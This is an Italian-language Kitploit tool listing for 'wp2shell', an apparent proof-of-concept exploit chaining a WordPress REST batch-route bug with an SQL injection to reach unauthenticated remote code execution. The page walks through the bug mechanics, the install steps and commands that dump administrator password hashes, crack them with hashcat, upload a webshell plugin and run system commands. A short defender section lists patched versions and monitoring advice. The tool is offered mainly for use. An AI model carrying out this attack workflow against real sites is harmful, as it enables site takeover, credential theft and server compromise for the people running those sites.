Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/ekomssavior/wp2shell
Password CrackingGenerazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebRaccolta InformazioniPenetration TestingRed Teaming
GitHubekomssavior/wp2shell

wp2shell

CVE-2026-63030 (RCE) + CVE-2026-60137 (SQLi)

Vedi Repository
82171 mese faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

wp2shell di: ek0ms savi0r

POC di Esecuzione Remota di Codice non autenticata per WordPress Core (CVE-2026-63030 + CVE-2026-60137)

L'exploit wp2shell per una catena di vulnerabilità critica nel core di WordPress. Combina un bug di confusione delle route batch dell'API REST con un'iniezione SQL in WP_Query per ottenere esecuzione remota di codice non autenticata su installazioni WordPress vulnerabili.

DettaglioInformazioni
CVECVE-2026-63030 (confusione delle route batch REST) + CVE-2026-60137 (SQLi author__not_in)
Versioni interessateWordPress 6.9.0 – 6.9.4, 7.0.0 – 7.0.1
Versioni corrette6.9.5, 7.0.2
Autenticazione richiestaNessuna — non autenticata
CVSSCritico (catena RCE)
Scoperto daAdam Kues (Assetnote / Searchlight Cyber)
DipendenzePython 3.8+ — solo libreria standard

Come Funziona

L'exploit combina due bug nel core di WordPress:

  1. CVE-2026-60137 — SQL Injection – Quando author__not_in viene passato come stringa invece che come array, WordPress salta il controllo di sanitizzazione is_array() e interpola il valore grezzo in una clausola SQL NOT IN (...).

  2. CVE-2026-63030 — Confusione delle Route Batch – L'endpoint /wp-json/batch/v1 costruisce array paralleli $matches e $validation. Una sotto-richiesta malformata viene aggiunta a $validation ma non a $matches, provocando uno spostamento dell'indice di +1. La sotto-richiesta i viene gestita con l'handler della sotto-richiesta i+1.

Combinati insieme: Una richiesta POST /wp/v2/posts contenente una richiesta interna GET /wp/v2/users con una stringa author_exclude bypassa sia la allow-list dei metodi sia la sanitizzazione degli input. La stringa raggiunge WP_Query come author__not_in e viene interpolata nell'SQL — fornendo iniezione SQL cieca non autenticata.

Da qui, lo strumento può:

  • Estrarre l'hash della password dell'amministratore
  • Autenticarsi come amministratore (una volta che l'hash viene craccato)
  • Caricare un plugin malevolo
  • Eseguire comandi di sistema arbitrari

Funzionalità


Installazione

root@kitploit:~
git clone https://github.com/ekomsSavior/wp2shell.git
cd wp2shell
chmod +x wp2shell.py

Tutto qui. Non sono richiesti pacchetti di terze parti.


Utilizzo

root@kitploit:~
./wp2shell.py <url> [command] [options]

Modalità Interattiva (Basata su Menu)

root@kitploit:~
./wp2shell.py http://target.com

Avvia un menu interattivo con tutte le funzionalità disponibili tramite opzioni numerate.

Comandi

check — Conferma Vulnerabilità (Sicura)

Esegue una sonda a ritardo temporale per confermare la sfruttabilità. Non legge alcun dato e non modifica nulla.

root@kitploit:~
./wp2shell.py http://target.com check

read — Estrazione Dati (Iniezione SQL Cieca)

Estrae informazioni dal database utilizzando un'iniezione SQL cieca basata sul tempo.

root@kitploit:~
# Server fingerprint (version, database, user)
./wp2shell.py http://target.com read

# Extract user logins and password hashes
./wp2shell.py http://target.com read --users

# Extract database name
./wp2shell.py http://target.com read --database

# Extract MySQL version
./wp2shell.py http://target.com read --version

# Custom SQL query
./wp2shell.py http://target.com read --query "SELECT @@version"

shell — Esecuzione Remota di Codice

Richiede credenziali di amministratore valide. L'iniezione SQL può recuperare l'hash della password, ma è necessario fornire la password in chiaro recuperata.

root@kitploit:~
# Execute a single command
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd "id"

# Execute a single command (short form)
./wp2shell.py http://target.com shell --user admin --password 'recovered_pass' --cmd whoami

Opzioni


Esempio di Flusso di Lavoro

root@kitploit:~
# 1. Check if the target is vulnerable
./wp2shell.py https://example.com check

# 2. Extract admin password hashes
./wp2shell.py https://example.com read --users

# 3. Crack the hash offline (using hashcat, john, etc.)
# hashcat -m 400 <hash> /path/to/wordlist.txt

# 4. Execute a command with the recovered password
./wp2shell.py https://example.com shell --user admin --password 'cracked_pass' --cmd "id"

Versioni Interessate

RamoVersioni interessateCorretta
6.9.x6.9.0 – 6.9.46.9.5
7.0.x7.0.0 – 7.0.17.0.2
6.8.x6.8.0 – 6.8.5 (solo SQLi, nessuna RCE)6.8.6

Le versioni precedenti alla 6.9.0 non sono interessate dalla catena RCE completa.


Rilevamento e Mitigazione

Per i Difensori:

  • Aggiornare immediatamente a 6.9.5, 7.0.2 o versioni successive
  • I clienti Cloudflare WAF sono protetti automaticamente
  • I clienti Wordfence dispongono di regole firewall
  • Monitorare le richieste POST /wp-json/batch/v1 con body requests annidati
  • Un 404 sulla route batch non significa sempre "patchato" — può anche indicare che un WAF/CDN sta bloccando l'accesso anonimo all'API REST

Disclaimer Legale

Questo strumento è destinato esclusivamente a scopi educativi e di test di sicurezza autorizzati.


Crediti

  • Scoperta: Adam Kues (Assetnote / Searchlight Cyber)
  • CVE-2026-60137 (SQLi): TF1T, dtro, haongo
  • CVE-2026-63030 (Confusione delle route batch): Adam Kues

Per maggiori dettagli sulla vulnerabilità, consulta il blog di ricerca di Searchlight Cyber.

Scarica lo strumento
FunzionalitàDescrizione
Verifica vulnerabilitàSonda sicura a ritardo temporale — non legge alcun dato, non modifica nulla
Estrazione datiIniezione SQL cieca con ottimizzazione tramite ricerca binaria per un'estrazione efficiente
Dump hash utenteEstrae gli hash user_login e user_pass da wp_users
Esecuzione remota di codiceAutenticazione come amministratore, caricamento di un plugin webshell, esecuzione di comandi
Shell interattivaSessione di esecuzione comandi persistente
Output a coloriFeedback visivo chiaro per i risultati della scansione
Nessuna dipendenzaUsa solo la libreria standard di Python
OpzioneDescrizione
--usersEstrae user_login e user_pass da wp_users
--databaseEstrae il nome del database corrente
--versionEstrae la versione di MySQL
--query "SQL"Esegue una query SQL personalizzata (estrazione cieca)
--user USERNome utente amministratore per RCE
--password PASSPassword amministratore per RCE (in chiaro, recuperata tramite SQLi)
--cmd CMDComando da eseguire tramite la webshell